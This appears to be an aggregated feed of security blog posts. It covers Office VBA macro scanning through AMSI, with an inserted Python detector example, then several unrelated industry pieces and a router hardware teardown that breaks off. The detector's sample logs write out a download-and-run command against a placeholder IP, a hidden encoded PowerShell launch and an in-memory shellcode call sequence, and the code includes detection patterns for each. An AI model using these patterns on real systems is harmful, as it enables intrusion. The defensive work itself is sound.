Invoked functions, methods, and APIs need to receive their parameters in the clear (plaintext) in order to work; thus, this behavioral instrumentation is not affected by obfuscation. This is a weak spot for malicious macro code: the antivirus now has visibility into the relevant activity of the macro in the clear.

To illustrate, consider the following string obfuscation in a shell command:

Shell("ma"+"l"+"wa"+"r"+"e.e"+"xe")

With the Office VBA and AMSI integration, this is logged like so:

Shell("malware.exe");

Triggering on suspicious behavior

When a potentially high-risk function or method (a trigger; for example, CreateProcess or ShellExecute) is invoked, Office halts the execution of the macro and requests a scan of the macro behavior logged up to that moment, via the AMSI interface. The AMSI provider (e.g., antivirus software) is invoked synchronously and returns a verdict indicating whether or not the observed behavior is malicious.

The list of high-risk functions, or triggers, is meant to cover actions at various stages of an attack chain (e.g., payload download, persistence, execution) and is selected based on their prevalence among malicious and benign macros. The behavior log sent over AMSI can include information like suspicious URLs from which malicious data was downloaded, suspicious file names known to be associated with malware, and others. This data is valuable in determining whether the macro is malicious, as well as in the creation of detection indicators, all without any influence from obfuscation.
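As an added illustration (my own code, not Microsoft's and not part of the original post), the following Python models the flow described in the last two sections: string expressions are evaluated before they reach the instrumented call boundary, the call is logged in the two formats shown above, and at each trigger call the log accumulated so far is handed to a provider that returns an AMSI verdict. Taken from the post: the two log formats and CreateProcess/ShellExecute as triggers; the AMSI_RESULT values are the ones defined in amsi.h. Everything else is assumed for the example: the remaining trigger names, the indicator rules (one of them mirrors the RWX-allocation-plus-callback shellcode pattern described later in the post), and every sample log line, path, URL and address, all of which are constructed.

```python
"""Toy model of the Office VBA behaviour log and the AMSI scan it feeds.
Added example, not Microsoft's code: the log formats and the CreateProcess/
ShellExecute triggers are from the post, AMSI_RESULT values from amsi.h;
the other trigger names, the rules and all sample lines are assumed."""
import re

AMSI_RESULT_CLEAN = 0          # amsi.h
AMSI_RESULT_DETECTED = 0x8000  # amsi.h

# Calls that halt the macro and trigger a scan of the log so far (assumed
# list; the post names CreateProcess and ShellExecute as examples).
EXEC_FUNCS = {"CreateProcess", "ShellExecute", "Shell", "Run", "Exec"}
CALLBACK_FUNCS = {"CreateThread", "EnumSystemLanguageGroupsW"}
TRIGGERS = EXEC_FUNCS | CALLBACK_FUNCS | {"URLDownloadToFile"}

# 1. Arguments are evaluated before they reach the instrumented call boundary.
_PIECE_RE = re.compile(r'StrReverse\("([^"]*)"\)|Chr\((\d+)\)|"([^"]*)"', re.I)

def resolve_vba_string(expr):
    """Evaluate literals, Chr(n), StrReverse("..") joined by + or &, as the VBA
    runtime does before the call; the obfuscation is gone once it is logged."""
    out = []
    for rev, code, lit in _PIECE_RE.findall(expr):
        out.append(rev[::-1] if rev else chr(int(code)) if code else lit)
    return "".join(out)

def format_call(obj, name, args):
    """Render a call in the post's log format: Obj.Method(a, b); or Api(a, b);"""
    rendered = ", ".join(f'"{a}"' if isinstance(a, str) else str(a) for a in args)
    return f"{obj + '.' if obj else ''}{name}({rendered});"

# 2. Parse logged calls back into (object, name, args).
_CALL_RE = re.compile(r"^(?:(?P<obj>[\w.]+)\.)?(?P<name>\w+)\((?P<args>.*)\);?$")

def _split_args(s):
    """Split on commas outside double quotes and strip the quotes."""
    args, cur, quoted = [], [], False
    for ch in s:
        quoted ^= ch == '"'          # toggle on every quote character
        if ch == "," and not quoted:
            args.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur or args:
        args.append("".join(cur))
    return [a.strip().strip('"') for a in args]

def parse_call(line):
    """Parse one log line; raises on anything that is not a logged call."""
    m = _CALL_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a logged call: {line!r}")
    return m.group("obj"), m.group("name"), _split_args(m.group("args"))

# 3. Provider-side rules over the log accumulated so far (assumed rules).
def assess(calls):
    """Return the indicators found in the parsed log; an empty list is clean."""
    names, reasons = [n for _, n, _ in calls], []
    downloaded = any(n == "URLDownloadToFile" for _, n, _ in calls)
    for _, name, args in calls:
        if name in EXEC_FUNCS and args:
            cmd = args[0].lower()
            if downloaded and re.search(r"\\(temp|appdata)\\", cmd):
                reasons.append(f"download then execute from user-writable path: {args[0]}")
            if "powershell" in cmd and re.search(r"-enc|-w hidden|downloadstring|iex", cmd):
                reasons.append(f"living-off-the-land PowerShell launch: {args[0]}")
    rwx = any(n == "VirtualAlloc" and a[-1:] == ["64"] for _, n, a in calls)  # 64 = RWX
    if rwx and "RtlMoveMemory" in names and names[-1] in CALLBACK_FUNCS:
        reasons.append("RWX VirtualAlloc + RtlMoveMemory + callback: in-memory shellcode")
    return reasons

def scan(log_lines):
    """Replay the log as the runtime would: at each trigger call hand the log so
    far to the provider; a detection halts the macro at that call index."""
    seen = []
    for idx, line in enumerate(log_lines):
        seen.append(parse_call(line))
        if seen[-1][1] in TRIGGERS:
            reasons = assess(seen)
            if reasons:
                return AMSI_RESULT_DETECTED, idx, reasons
    return AMSI_RESULT_CLEAN, len(log_lines), []

# Constructed sample logs (203.0.113.0/24 is a documentation address range).
DOWNLOADER_LOG = [
    r'URLDownloadToFile(0, "http://203.0.113.5/u.dat", "C:\Users\u\AppData\Local\Temp\upd.exe", 0, 0);',
    r'Shell("C:\Users\u\AppData\Local\Temp\upd.exe", 1);']
LOLBIN_LOG = ['CreateObject("WScript.Shell");',
              'WScript.Shell.Run("powershell -w hidden -enc SQBFAFgA", 0);']
SHELLCODE_LOG = ["VirtualAlloc(0, 4096, 12288, 64);",           # 64 = PAGE_EXECUTE_READWRITE
                 "RtlMoveMemory(2143289344, 1234567, 312);",
                 "EnumSystemLanguageGroupsW(2143289344, 1, 0);"]  # callback hands control to the buffer
BENIGN_LOG = ['ActiveDocument.Range.InsertAfter("Invoice total: 42.00");',
              'Shell("notepad.exe", 1);']

if __name__ == "__main__":
    print(format_call(None, "Shell", [resolve_vba_string('"ma"+"l"+"wa"+"r"+"e.e"+"xe"')]))
    for label, log in [("downloader", DOWNLOADER_LOG), ("lolbin", LOLBIN_LOG),
                       ("shellcode", SHELLCODE_LOG), ("benign", BENIGN_LOG)]:
        print(label, scan(log))
```

Running the module prints the resolved Shell call and a verdict tuple (result, index of the call at which the macro would be halted, reasons) for each sample. A real provider is a DLL that receives the buffer through AmsiScanBuffer and returns an AMSI_RESULT; this stand-in keeps only the verdict logic, and the benign sample shows that a trigger alone (Shell) does not produce a detection, only the surrounding behaviour does.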

Stopping malicious macros upon detection

If behavior is assessed malicious, macro execution is stopped. The user is notified by the Office application, and the application session is shut down to avoid any further damage. This can stop an attack in its tracks, protecting the device and user.

Figure 3. Malicious macro notification

Case study 1: Heavily obfuscated macro code

(SHA-256: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd)

To illustrate how the Office VBA and AMSI integration can expose malicious macro code, let's look at a recent social engineering attack that uses macro-based malware. The initial vector is a Word document with instructions in Chinese to "Enable content".

Figure 4: The malicious document instructs the user to enable content

If the recipient falls for the lure and enables content, the malicious macro code runs and launches a command to download the payload from a command-and-control server controlled by the attacker. The payload, an installer file, is then run.

The macro code is heavily obfuscated:

Figure 5: Obfuscated macro

However, behavior monitoring is not hindered by obfuscation. It produces the following log, which it passes to AMSI for scanning by antivirus:

Figure 6: De-obfuscated behavior log

The action carried out by the macro code is logged, clearly exposing malicious actions that antivirus solutions can detect much more easily than if the code was obfuscated.

Case study 2: Macro threat that lives off the land

(SHA-256: 7952a9da1001be95eb63bc39647bacc66ab7029d8ee0b71ede62ac44973abf79)

The following is an example of macro malware that lives off the land, meaning that it stays off the disk and uses common tools to run code directly in memory. In this case, it uses shellcode and dynamic pages. Like the previous example, this attack uses social engineering to get users to click Enable Content and run the macro code, but this one uses instructions in Spanish in an Excel workbook.

Figure 7. Malicious Excel file with instructions to enable content

When run, the macro code dynamically allocates virtual memory, writes shellcode to the allocated location, and uses a system callback to transfer execution control. The malicious shellcode then achieves fileless persistence, being memory-resident without a file.

Figure 8. Macro code utilizing Win32 APIs to launch embedded shellcode

When the shellcode gets execution control, it launches a PowerShell command to download additional payload from a command-and-control server controlled by the attacker.

Figure 9. PowerShell command that downloads payload

Even though the macro code uses a fileless execution technique based on shellcode, its behavior is exposed to antivirus solutions via the AMSI interface. A sample log is shown below:

Figure 10. De-obfuscated behavior log

With the AMSI scan integration in both Office VBA and PowerShell, security solutions like Windows Defender ATP can gain clear visibility into malicious behavior at multiple levels and successfully block attacks.

Windows Defender ATP: Force multiplier and protection for down-level platforms

In addition to protecting users running Office 365 applications on Windows 10, detections via AMSI allow modern endpoint protection platforms like Windows Defender ATP to extend protection to customers via the cloud.

Figure 11. Simplified diagram showing how AMSI detections in a few machines are extended to other customers via the cloud

In Windows Defender AV's cloud-delivered antivirus protection, the Office VBA and AMSI integration enriches the signals sent to the cloud, where multiple layers of machine learning models classify and make verdicts on files. When devices encounter documents with suspicious macro code, Windows Defender AV sends metadata and other machine learning features, coupled with signals from Office AMSI, to the cloud. Verdicts by machine learning translate to real-time protection for the rest of Windows Defender AV customers with cloud protection enabled.

This protection is also delivered to the rest of Microsoft 365 customers. Through the Microsoft Intelligent Security Graph, security signals are shared across components of Microsoft 365 threat protection. For example, in the case of macro malware, detections of malicious macro-laced documents by Windows Defender AV are shared with Office 365 ATP, which blocks emails carrying the document, stopping attacks before the documents land in users' mailboxes.

Figure 12. The Office and AMSI integration enriches the orchestration of protection across Microsoft 365

Within a few weeks after the release of this new instrumentation in Office VBA and its adoption by Windows Defender ATP, we saw this multiplier effect, with signals from a few hundred devices protecting several tens of thousands of devices. Because the Office AMSI feature exposes the behavior of a macro irrespective of content, language, or obfuscation, signals from one part of the world can translate to protection for the rest of the globe. This is powerful.

Availability

AMSI integration is now available and turned on by default on the Monthly Channel for Office 365 client applications including Word, Excel, PowerPoint, Access, Visio, and Publisher.

In its default configuration, macros are scanned at runtime via AMSI except in the following scenarios:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from trusted locations
  • Documents that are trusted documents
  • Documents that contain VBA that is digitally signed by a trusted publisher

Office 365 applications also expose a new policy control for administrators to configure if and when macros are scanned at runtime via AMSI:

Group Policy setting name: Macro Runtime Scan Scope
Path: User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings
Description:

This policy setting specifies for which documents the VBA Runtime Scan feature is enabled.

Disable for all documents: If the feature is disabled for all documents, no runtime scanning of enabled macros will be performed.

Enable for low trust documents: If the feature is enabled for low trust documents, the feature will be enabled for all documents for which macros are enabled except:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from a Trusted Location
  • Documents that are Trusted Documents
  • Documents that contain VBA that is digitally signed by a Trusted Publisher

Enable for all documents: If the feature is enabled for all documents, then the above class of documents is not excluded from the behavior.

This protocol allows the VBA runtime to report to the Anti-Virus system certain high-risk code behaviors it is about to execute and allows the Anti-Virus to report back to the process if the sequence of observed behaviors indicates likely malicious activity so the Office application can take appropriate action.

When this feature is enabled, affected VBA projects’ runtime performance may be reduced.

Conclusion: Exposing hidden malicious intent

Macro-based malware continuously evolves and poses detection challenges through techniques like sandbox evasion and code obfuscation. AMSI's integration with Office 365 applications enables runtime scanning of macros, exposing malicious intent even under heavy obfuscation. This latest improvement to Office 365 allows modern endpoint security platforms like Windows Defender ATP to defeat macro-based threats.

Code instrumentation and runtime monitoring are powerful tools for threat protection. Combined with runtime scanning via AMSI, they enable antivirus and other security solutions to have greater visibility into the runtime behavior of a macro execution session at a very granular level, while also bypassing code obfuscation. This enables antivirus solutions to (1) detect a wide range of mutated or obfuscated malware that exhibit the same behavior using a smaller but more efficient set of detection algorithms, and (2) impose more granular restrictions on what macros are allowed to do at runtime.

Moreover, AMSI protection is not limited to macros. Other scripting engines like JavaScript, VBScript, and PowerShell also implement a form of code instrumentation and interface with AMSI. Attacks with multiple stages that use different scripts will be under scrutiny by AMSI at each step, exposing all behaviors and enabling detection by antivirus and other solutions.

We believe this is another step forward in elevating security for Microsoft 365 customers. More importantly, AMSI and Office 365 integration enables the broader ecosystem of security solutions to better detect and protect customers from malicious attacks without disrupting day-to-day productivity.

Giulia Biagini, Microsoft Threat Intelligence Center
Sriram Iyer, Office Security
Karthik Selvaraj, Windows Defender ATP Research

The post Office VBA + AMSI: Parting the veil on malicious macros appeared first on Microsoft Secure.

Taking Stock: The Internet of Things, and Machine Learning Algorithms at War

It’s in the news every day; hackers targeting banks, hospitals, or, as we’ve come to fear the most, elections.

Suffice to say then that cybersecurity has, in the last few years, gone from a relatively obscure industry – let’s qualify that: not in the sense of importance, but rather how folks have been interacting with it – to one at the forefront of global efforts to protect our data and applications.

A decade ago, cybersecurity researchers were almost as caliginous as the hackers they were trying to defend folks against, and despite the lack of fanfare, some people still chose it as a career (*gasp).

We spoke to one of our whizz-kids, Gilad Yehudai, to find out what makes him tick and why, of all the possible fields in tech, he chose cybersecurity at a time when it might not have been the sexiest of industries.

Protecting data and applications, a different beast altogether

One of the major challenges facing the industry is the ability to attract new talent; especially when competing against companies that occupy the public sphere from the moment our alarm wakes us up to the moment we lay our phones to rest. Gilad, who has a master’s degree in mathematics and forms part of our team in Israel, offers a pretty interesting perspective,

“The world of cybersecurity is a fascinating one from my point of view, especially when trying to solve machine learning problems related to it. Cybersecurity is adversarial in nature, where hackers try to understand security mechanisms and how to bypass them. Developing algorithms in such environments is much more challenging than algorithms where the data doesn’t try to fool you.”

Never a dull moment

Additionally, our industry is one in flux, as more threats and vulnerabilities are introduced, and hackers find new ways to bypass security mechanisms. The latter was a pretty big draw for Gilad, whose experience in mathematics and serving in the Israeli Army’s cyber defense department made him a great candidate for the Imperva threat research team.

“The research group at Imperva seemed like the perfect fit, as large parts of my day to day job is to develop machine learning algorithms in the domain of cybersecurity, and the data I use is mostly attacks on web applications.”

Speaking of attacks, Gilad and the rest of our research team sure have their hands full.

“In my opinion, the Internet of Things (IoT) security is one of the biggest challenges out there. More and more devices are connected to the internet every day and these devices may be put to malicious use. Hackers may enlist these devices to their botnet in order to launch attacks like DDoS, ATO (account takeover), comment spam and much more.”

Worse still, our growing network of ‘micro-computers’ (smartphones, tablets etc.) could be manipulated and their computational power used to mine cryptocurrencies.

“Protecting these devices the same way we protect endpoint PCs will be one of the biggest challenges.”

Change brings new challenges, and opportunities

On the topic of change, the cybersecurity industry, according to Gilad, is headed increasingly towards machine learning and automation; which serves us well.

“If in the past most security mechanisms were based on hard-coded rules written by security experts, today more and more products are based on rules that are created automatically using artificial intelligent algorithms. These mechanisms can be much more dynamic and adapt better to the ever-changing world of cybersecurity.”

That said, the more the industry relies on machine learning algorithms for defense, the higher the likelihood that hackers will look to manipulate those same algorithms for their own purposes.

“Hackers may try to create adversarial examples to fool machine learning algorithms. Securing algorithms will require more effort, effort that will intensify as these algorithms are used in more sensitive processes. For example, facial recognition algorithms that authorize access to a specific location may be fooled by hackers using an adversarial example in order to gain access to an unauthorized location.”

While the cyber threat landscape continues to evolve, and the bad actors looking to nick our data and compromise our applications get increasingly creative, it’s good to know that there are experts whose sole purpose it is to ‘fight the good fight’, so to speak.

“Research is a bit like walking in the dark, you don’t know in which direction to go next, and you never know what you are going to find. Sometimes you begin to research in some direction, and in the process you find a completely different direction which you haven’t even thought about at the beginning. Research is not for everybody, but I get really excited about it.”

NIST Launches Privacy Framework Effort

On September 4, 2018, the Department of Commerce’s National Institute of Standards and Technology (“NIST”) announced a collaborative project to develop a voluntary privacy framework to help organizations manage privacy risk. The announcement states that the effort is motivated by innovative new technologies, such as the Internet of Things and artificial intelligence, as well as the increasing complexity of network environments and detail of user data, which make protecting individuals’ privacy more difficult. “We’ve had great success with broad adoption of the NIST Cybersecurity Framework, and we see this as providing complementary guidance for managing privacy risk,” said Under Secretary of Commerce for Standards and Technology and NIST Director Walter G. Copan.

The goals for the framework stated in the announcement include providing an enterprise-level approach that helps organizations prioritize strategies for flexible and effective privacy protection solutions and bridge gaps between privacy professionals and senior executives so that organizations can respond effectively to these challenges without stifling innovation. To kick off the effort, the NIST has scheduled a public workshop on October 16, 2018, in Austin, Texas, which will occur in conjunction with the International Association of Privacy Professionals’ “Privacy. Security. Risk. 2018” conference. The Austin workshop is the first in a series planned to collect current practices, challenges and requirements in managing privacy risks in ways that go beyond common cybersecurity practices.

In parallel with the NIST’s efforts, the Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) is “developing a domestic legal and policy approach for consumer privacy.” The announcement stated that the NTIA is coordinating its efforts with the department’s International Trade Administration “to ensure consistency with international policy objectives.”

Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners

Law firms tasked with analyzing mounds of data and interpreting dense legal texts can vastly improve their efficiency by training artificial intelligence (AI) tools to complete this processing for them. While AI is making headlines in a wide range of industries, legal AI may not come to mind for many. But the technology, which is already prevalent in the manufacturing, cybersecurity, retail and healthcare sectors, is quickly becoming a must-have tool in the legal industry.

Due to the sheer volume of sensitive data belonging to both clients and firms themselves, legal organizations are in a prickly position when it comes to their responsibility to uphold data privacy. Legal professionals are still learning what the privacy threats are and how they intersect with data security regulations. For this reason, it’s critical to understand security best practices for operations involving AI.

Before tackling the cybersecurity implications, let’s explore some reasons why the legal industry is such a compelling use case for AI.

How Do Legal Organizations Use AI?

If you run a law firm, imagine how much more efficient you could be if you could train your software to recognize and predict patterns that not only improve client engagement, but also streamline the workflow of your legal team. Or what if that software could learn to delegate tasks to itself?

With some AI applications already on the market, this is only the beginning of what the technology can do. For example, contract analysis automation solutions can read contracts in seconds, highlight key information visually with easy-to-read graphs and charts, and get “smarter” with each contract reviewed. Other tools use AI to scan legal documents, case files and decisions to predict how courts will rule in tax decisions.

In fact, the use of AI in the legal industry has been around for years, according to Sherry Askin, CEO of Omni Software Systems. Askin has deep roots in the AI field, including work with IBM’s Watson.

“AI is all about increasing efficiency, and is being touted as the next revolution,” she said. “We’ve squeezed as much as we can from human productivity through automation. The next plateau from productivity and the next threshold is AI.”

Why Machine Learning Is Critical

Law is all about words, natural language and the coded version of an unstructured version, said Askin. While we know how to handle the coded versions, she explained, the challenge with legal AI is that outputs are so tightly tailored to past results described by their inputs. That’s where machine learning comes in to predict how these inputs might change.

Askin compared machine learning to the process of intellectual development by which children soak up news words, paragraphs, long arguments, vocabulary and, most importantly, context. With deep learning, not only are you inputting data, but you’re giving the machine context and relevance.

“The machine is no longer a vessel of information,” Askin explained. “It figures out what to do with that information and it can predict things for you.”

Although machines can’t make decisions the same way that humans can, the more neural processing and training they conduct, the more sophisticated their learning and deliverables can become. Some legal AI tools can process and analyze thousands of lease agreements, doing in seconds what humans would do in weeks.

How Do Privacy Regulations Impact Legal Firms?

For any industry, protecting privileged client data is a paramount concern. The American Bar Association, which requires practitioners to employ reasonable efforts to prevent unauthorized access to client data, has implemented periodic changes and updates to address the advances of technology. In addition, the Legal Cloud Computing Association (LCCA) issued 21 standards to assist law firms and attorneys in addressing these needs, including testing, limitations on third-party access, data retention policy, encryption, end user authentication and modifications to data.

Askin urged legal organizations to evaluate strategies impacting security and privacy in the context of what they modify or replace.

“I believe this is a major factor in legal because the profession has a deep legacy of expert-led art,” she said. “Traditional IT automation solutions perform best with systematized process and structured data. Unfortunately, systematization and structure are not historically compatible with the practice of law or any other professional disciplines that rely on human intelligence and dynamic reasoning.”

How to Keep Legal AI Tools in the Right Hands

Legal organizations are tempting targets for malicious actors because they handle troves of sensitive and confidential information. Rod Soto, director of security research for Jask, recommended several key strategies: employ defense in depth principles at the infrastructure level, train personnel in security awareness and use AI to significantly enhance security posture overall. To protect automated operations conducted by AI, Soto warned, we must understand that while these AI systems are trained to be effective, they can also be steered off course.

“Malicious actors can and will approach AI learning models and will attempt to mistrain them, hence the importance of feedback loops and sanity checks from experienced analysts,” he said. “You cannot trust AI blindly.”

Finally, it’s crucial for legal organizations to understand that AI does not replace a trained analyst.

“AI is there to help the analyst in things that humans have limitations, such as processing very large amounts of alarms or going through thousands of events in a timely manner,” said Soto. “Ultimately, it is upon the trained analyst to make the call. An analyst should always exercise judgment based on his experience when using AI systems.”

Because the pressure to transform is industrywide, profound changes are taking shape to help security experts consistently identify the weakest link in the security chain: people.

“It’s nearly impossible to control all data and privacy risks where decentralized data and human-managed processes are prevalent,” Askin said. “The greater the number of endpoints, the higher the risk of breach. This is where the nature of AI can precipitate a reduction in security and privacy vulnerabilities, particularly where prior IT adoption or data protection practices were limited.”

The post Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners appeared first on Security Intelligence.

Uber Data Breach Class Action Must Proceed to Arbitration

On September 5, 2018, the U.S. District Court for the Central District of California held that a class action arising from a 2016 Uber Technologies Inc. (“Uber”) data breach must proceed to arbitration. The case was initially filed after a 2016 data breach that affected approximately 600,000 Uber drivers and 57 million Uber customers. Upon registration with Uber, the drivers and customers entered into a service agreement that contained an arbitration provision. Based on this provision, the defendants moved to compel arbitration. They argued that the provision’s express language delegated the threshold issue of whether the case should be arbitrated (also called an issue of “substantive arbitrability”) to an arbitrator, not to the court. The plaintiffs countered, arguing that the arbitration clause was both inapplicable to the 2016 data breach and unconscionable, and that Uber customers did not receive reasonable notice of the electronic terms agreement when they registered.

The court rejected each of the plaintiffs’ arguments. First, citing Mohammed v. Uber Techs., Inc., 848 F.3d 1201, 1209 (9th Cir. 2016), the court held that the agreement’s language “clearly and unmistakably” delegated to the arbitrator the threshold and substantive issue of whether the 2016 breach was one that should be arbitrated. Second, whether the arbitration provision was unconscionable was similarly a question of substantive arbitrability “expressly delegated to the arbitrator.” Third, the court noted that the plaintiffs offered no evidence of confusion or lack of notice, and that many other courts had found similar electronic notice to be reasonable.

The case has been stayed pending completion of the arbitration.

How Can Media Companies Be More Confident in Their Cybersecurity Strategy and Policy?

While many industries have matured their cybersecurity strategy and policy as the digital landscape has evolved, others — such as media companies — remain unsure how to advance.

With more consumers relying on the internet for their entertainment and information consumption, media enterprises are tasked with providing a flawless user experience and continuous content delivery. But the industry is prey to a growing number of predators. As a result, a recent Akamai study titled “The State of Media Security” found that only 1 percent of media companies are “very confident” with their cybersecurity efforts.

What Challenges Do Media Companies Face?

The threat of a distributed denial-of-service (DDoS) attack, which could slow services or result in downtime, is only one of the many security challenges media companies face. Also of concern is the potential for malicious actors to steal content or breach systems and access customer networks.

“It’s not surprising that media companies aren’t confident about their security levels,” said Elad Shapira, head of research at Panorays. “They are an ongoing target, whether by political activists or nation states … Then there are those hackers just trying to leverage their skills to make money from the content they steal.”

SQL injections, Domain Name System (DNS) attacks, content pirating and DDoS attacks are among the greatest threats to the media industry. The dynamic nature of the digital ecosystem, where digital partners can change by the day, enables bad actors to optimize the reach of their malicious campaigns.

“Media organizations in particular should be afraid of their heavily trafficked digital assets, which not only serve as touch points to prospects and customers, but also provide entry points to bad actors,” said Chris Olson, CEO of The Media Trust. “These miscreants often target third-party code providers and digital advertising partners, who tend to have weaker security measures in place.”

In the past, security discussions at media companies focused largely on piracy, said Shane Keats, director of global industry strategy, media and entertainment at Akamai. It’s now incumbent upon media companies to recognize that security has extended far beyond digital rights management.

Why Do Cybercriminals Target Media Companies?

Cybercriminals rarely discriminate when it comes to their targets — which means that in the eyes of a criminal, media companies look an awful lot like retailers and banks.

“With the rise of subscription-based monetization, media companies are now increasingly capturing personally identifiable information (PII) and payment card information (PCI) that [looks] no different from the PII and PCI captured by an e-commerce company,” said Keats. “Successfully stealing a streaming video on demand (SVOD) customer database with a million customer records yields the same ROI as one stolen from an online retailer.”

Whether protecting against credentials-stuffing from malicious bots or careless contractors in the vendor landscape, media companies need to practice good security hygiene and be wary of the security practices of partners who have access to their customers’ networks. As has been the case in so many major breaches, all an attacker has to do is compromise one of those partners to gain access to the firewall and steal content, customer data and executive communications.

How Can Media Companies Improve Cybersecurity Strategy and Policy?

In addition to acquiring a reputable cloud security firm to help investigate the attack surfaces exposing their businesses, media companies also need to ensure that they have solutions to protect each of those points.

“Find a firm that has enough scale to be able to see a ton of threats, both traditional and emerging, and ask the firm to help you understand how to best secure your apps and architecture beyond buzzwords,” Keats advised. “When you do this information session, get your different stakeholders in the room so that you can look at your security posture as a team. This is not the time for turf wars.”

By taking the following steps, media companies can enhance their security strategy and feel more confident that they are protected against current and emerging threats:

  • Discover and prioritize impacts of assets. Not all assets are created equal. An online release of a video prior to its debut screening may create reputational and financial damage to a company, but the credit card details of subscribers are under regulatory control. Each company needs to consider its assets and how they impact the business.

  • Collaborate with direct and indirect third parties. Websites have an average of 140 third parties who execute anywhere from 50 to 95 percent of their code. Most website owners only know, at most, half of the third parties with whom they do business.

  • Vet third parties. Media companies should ask their third and downstream parties the hard questions about security and follow up with frequent audits of security measures. Companies should enforce their digital policies through service-level agreements (SLAs) and contract clauses.

  • Place safety measures around these assets. Safety measures should span various levels, including networks and IT to prevent a DDoS attack, as well as on applications to avoid account breaches. Consider the human element to prevent disgruntled employees from exposing sensitive and proprietary data. Media companies should continuously scan assets in real time to identify and terminate any threats.

  • Create an incident response plan. This is not just a technological approach, but a step that must involve various teams and processes. In case of an attack against the company, there should be an advanced, detailed and well-rehearsed plan to respond.

A data breach poses a significant financial and reputational risk to media companies. To avoid becoming the next headline, businesses need to thoroughly understand not only their own risks, but also the risks that their suppliers pose.

Once media companies understand those risks, they can take measures to continuously protect against emerging threats. Collaboration throughout the organization, as well as with extended partners, will help to enforce strong digital policies and remediate unauthorized activities within the digital ecosystem.

The post How Can Media Companies Be More Confident in Their Cybersecurity Strategy and Policy? appeared first on Security Intelligence.

Assessing the security of a portable router: a look inside its hardware

Network administrators should perform security assessments of the hardware they provide to their users, and particularly paranoid users might want to poke at their own devices just to be extra sure.

In this blog post, we will demonstrate the techniques used to assess security on a generic portable router purchased online. We have redacted its identifiable information as our goal here isn’t to provide a free penetration test to the hardware manufacturer. (Someone enterprising enough could still figure this out.)

Can we actually trust this device? This was an inexpensive router, and probably assembled with off-the-shelf components.

In order to assess how secure this device really is, we are going to have to take it apart and figure out what makes it tick.

The packaging

The router came in a small box covered in helpful information about its capabilities, with the only brand attribution being a silver sticker with [REDACTED] written on it.


It looks like a device made by a third party and re-branded to quickly bolster the product offerings of another company. A quick Google search did not yield a website for this product on the first page of results, but more digging did reveal a manufacturer that we will not disclose here.

Perusing their product line, we were able to find the router we had purchased. We located a firmware update and downloaded it for further investigation. More on this later.

Gathering equipment

Once we received the router, the first thing we did was disassemble it. The best tool to do this is the ifixit tool kit.

This is the gold standard for disassembling stuff. It comes with many of the esoteric fastener heads devised to frustrate anyone trying to take things apart.

This mini router had no visible screws—this is a trend for many devices as of late. Disassembly required the use of the “spudge tool” from the ifixit toolkit, and we gently pried the cover off. Thankfully, there weren’t any of the warranty “void if tampered” stickers. These are illegal.

Taking the router apart revealed the main router board with two antennae and one chip in the center. The main chip in the center was a MIPS processor, and there’s a specific model number silk-screened onto the mainboard.

Some light Googling revealed that this chipset has a manufacturer website and even a product-specific page.

I also found a WikiDevi page on our exact model. WikiDevi is a user-editable database for computer hardware based on MediaWiki and Semantic MediaWiki. This page contains a ton of good info on the chipset, its capabilities, where it is sold, and by whom.

Let’s file those tidbits of information away for now. We’ll come back to them later.

The board has four unpopulated pin holes. These are typically called either “plated-through holes” or “annular rings.” We will just refer to them as plated-through holes for this exercise.

This looks suspiciously like an interface that the manufacturer left on the mainboard. These plated-through holes are usually used to flash the operating system onto the board and test the unit at the factory to verify everything is working properly. There’s no attempt made to hide its purpose.

After some light digging on the product website, we did find mention of the slow I/O features of this chipset.

Further Googling showed that this pinout is fairly common and might be of the UART variety.

There’s mention of UART on the [REDACTED] product page. This looks promising, like a good place to start. But the plated-through holes are in an awkward position, and examining the mainboard is difficult.

More equipment

In order to get a better look, we did some online shopping. We purchased a “third hand” to hold the mainboard. This portable router is bolted straight to a transformer for the sake of compactness. This means we are in the proximity of 120 Volts, so we should exercise a modicum of caution.

This device is compact and tightly integrated. The chips on the mainboard are pretty small, and our eyesight isn’t what it used to be. Back to the Internet to get a jeweler’s lamp.

So now we had the magnifying lamp, and it is much better than the little one that comes with the third hand. The LED lights also made examining the main board much easier.

To interact with these pins, we could solder wires in, but we’re planning on using this device, provided it passes muster. This meant we were going to try and be as delicate with our probing as we could. Back to the Internet. After some searching, we found breakaway headers.

Snapping four off the length makes for a perfect pinout adapter. No solder needed, plus easy access for eventually connecting the USB header and for probing the pins.

Shopping

Now we needed to investigate what those diagnostic pins were. Did they have voltage? Were they used to send and receive information? Back to the Internet again for more shopping.

Not wanting to buy something too cheap or inappropriate for the task, we Googled “affordable voltmeter” and found a review of decent and affordable voltmeters. We settled on the Extech EX330 Autoranging Mini Multi-Meter with Built-In Thermometer and Type K Remote Probe.

We also purchased the additional probe connectors kit for good measure. We started with checking for voltage. The bottom half of the router is the transformer. It typically steps down from 120 Volts to 12 Volts. We set the voltmeter to 200 Volts, just to be safe, and got to probing.

Diving in

The bottom plated-through hole had a square about it. Maybe it was special? So we started by applying the ground to it and power to the top pin, and the result was -3.3 Volts. Quickly inverting the probes gave us +3.3 Volts.

Some quick Googling told us that there are two common voltages used in these types of interfaces: 3.3 Volts and 5 Volts. It looks like our router is of the 3.3 Volts variety, the top pin is ground, and the bottom square pin is positive with 3.3 Volts.

So now we knew what the top and bottom pins were. This left the two center pins as a mystery.

Many other much more talented people than us have gone down this particular rabbit hole, and in this, Google was invaluable. We found pictures of other UART interfaces on other routers.

It does not appear that there’s a standardized pin order, but in most of the examples we found online, gnd (ground) and VCC are at the outer edges.

In our case, VCC would stand for “Voltage Common Collector.” More Googling indicated that there is a cable available to interface with these pins and, most importantly, that you don’t need to connect the 3.3 Volt pin unless you want to watch your cable, your router, and potentially your computer go “poof-the-magic-dragon.”

Good to know. Let’s also store this tidbit of information for later.

More shopping

So back to more shopping. We found a USB to RS232 TTL UART PL2303HX Converter USB to COM Cable Adapter Module.

We also found some that specified that they came with both voltage selections and, just to be thorough, we also ordered one of these. It wasn’t available with Prime, so we’re still waiting for this to arrive from the slow boat from China.

Back to the investigation

